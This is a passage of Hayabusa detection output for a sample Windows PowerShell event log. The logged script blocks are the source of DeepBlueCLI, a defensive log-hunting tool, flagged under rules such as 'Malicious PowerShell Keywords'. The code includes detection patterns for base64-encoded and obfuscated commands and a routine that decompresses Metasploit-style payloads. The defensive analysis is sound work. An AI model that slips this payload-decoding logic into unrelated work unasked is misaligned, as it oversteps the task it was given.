regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.Strin",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:49:18.983 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:49:18.983 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"g + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. 
Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:49:18.983 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"g + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. 
# I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:49:18.987 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. 
$groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. 
$servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) #if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ # The path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } #} } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:49:18.992 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:49:18.994 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} 
""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:49:32.379 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:49:32.379 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:49:32.379 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. 
# $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:49:32.380 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. 
Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:49:33.354 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:11:09.934 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:11:24.665 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:11:27.663 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:11:27.669 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Obfu $pscommand) $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Obfu $commandline) $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if 
($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:11:27.669 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
